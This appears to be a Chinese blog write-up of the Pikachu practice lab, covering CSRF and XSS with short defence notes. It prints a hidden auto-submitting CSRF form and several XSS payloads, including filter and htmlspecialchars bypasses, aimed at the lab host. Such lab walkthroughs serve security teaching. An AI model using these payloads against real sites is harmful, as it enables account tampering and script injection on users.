发表更新penetration Test / train3 分钟读完 (大约433个字)

something about Pikachu - CSRF

pikachu

pikachu => 备份地址

CSRF

概述

Cross-site request forgery,简称’CSRF’。由攻击者伪造一个请求(一般以链接的形式),然后欺骗用户进行点击, 用户一但点击了请求,整个攻击就完成了。因此CSRF攻击也被称为one click攻击。

  • CSRF 与 XSS 区别

    XSS一般盗取用户的cookie后,由攻击者利用cookie自行执行恶意操作。 攻击者 登录凭证
    CSRF则是攻击者构造好恶意请求后,交给用户,由用户本人自行点击链接发起请求,若刚好用户的对应网站刚好处于登录 状态,那么相当于用户自己做的恶意操作。 攻击者 登录凭证

  • CSRF防范

    • 对敏感操作增加安全token

    • 对敏感操作增加验证码

    • 对敏感操作增加安全逻辑流程

      如修改密码时先验证旧密码。

CSRF(get)

修改个人信息没有安全防护,因此构造恶意链接诱导用户点击,修改用户性别。

1
/http://train.com/pikachu/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=18626545453&add=chain&email=vince%40pikachu.com&submit=submit

CSRF(post)

构造一个html页面,诱导用户访问,页面访问后执行恶意请求。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<html>
  <head>
    <script>
      window.onload = function() {
              document.getElementById("postBtn").click();
            }
    </script>
  </head>

  <body>
    <div>
      <h1>正常页面</h1>
    </div>

    <div style="display: none">
      <form method="post" action="http://train.com/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
        <input name="sex" value="bad">
        <input name="phonenum" value="18626545453">
        <input name="add" value="china">
        <input name="email" value="vince@pikachu.com">
        <input id="postBtn" type="submit" name="submit" value="submit">
      </form>
    </div>
  </body>
</html>

CSRF(token)

页面有一个隐藏域用来持有token值,此token值是正常登录访问页面时服务器给的随机值, 不是能够简单获取的。因此,使用token进行防范,是一个比较好的手段。

 
发表更新penetration Test / train4 分钟读完 (大约598个字)

something about Pikachu - Cross-Site Scripting

pikachu

pikachu => 备份地址

Cross-Site Scripting

概述

XSS(跨站脚本攻击)一般常见如下几种类型:

  • 反射型(Reflected)
  • 存储型(Stored)
  • DOM型(DOM)

常见防范手段:

  • 输入过滤

    对输入内容进行过滤,不允许可能导致XSS攻击的字符输入。

  • 输出过滤

    根据输出点的位置对输出到前端的内容进行适当转义。

反射型xxs(get)

在输入框中直接输入对应脚本语句即可。
输入框有长度限制,或者审查元素中修改长度限制,或者直接构造URL

1
http://train.com/pikachu/vul/xss/xss_reflected_get.php?message=<script>alert('bad');</script>&submit=submit

反射型xxs(post)

反射型xxs(get)类似。

存储型xss

留言板功能,用户输入未做过滤,直接存储在DB中,取出渲染时也未做处理。 直接存入脚本语句即可。

DOM型XSS

在输入框中输入的内容会被拼接成超链接的href属性,因此构造闭合标签。

1
'></a> <img src="nothing" onerror="alert('bad');" /> <a href='

DOM型XSS-x

在输入框中输入的内容会被拼接成超链接的href属性,但是必须要先点击先出现的超链接,触发domxss()方法,
才会拼接生成对应超链接。

构造闭合标签与DOM型XSS相同。

XSS之盲打

盲打就是注入脚本后,没有即时反馈。
因此需要尽可能多的提交XSS语句,查看哪些语句被执行了。

此次盲打是存储型XSS,是输入意见名字,因此对应注入:

意见

1
<script>alert('msg');</script>

名字

1
<script>alert('name');</script>

登录显示页面查看: 全部注入成功。

1
http://train.com/pikachu/vul/xss/xssblind/admin.php

XSS之过滤

<script>标签被过滤了,使用<img/>标签注入。 只是简单的直接匹配,大小写转换后尝试,<SCRIPT>也可以。

1
<img src="nothing" onerror="alert('bad');" />

XSS之htmlspecialchars

php的htmlspecialchars()函数将字符转换为html实体,如<转换为&lt;

利用<a>标签的onclick事件,不使用特殊符号,只使用'(单引号)。

1
' onclick='alert(/bad/);'

XSS之href输出

html<a>标签的href属性可以指定script

1
<a href="javascript:alert('bad')"> 阁下自己输入的url还请自己点一下吧</a>

XSS之js输出

内容提交后,拼接到script中,由javascript根据内容判断渲染什么内容。
因此可以构造闭合<script>标签。

1
';</script><script>alert("bad");</script>
 

归档

×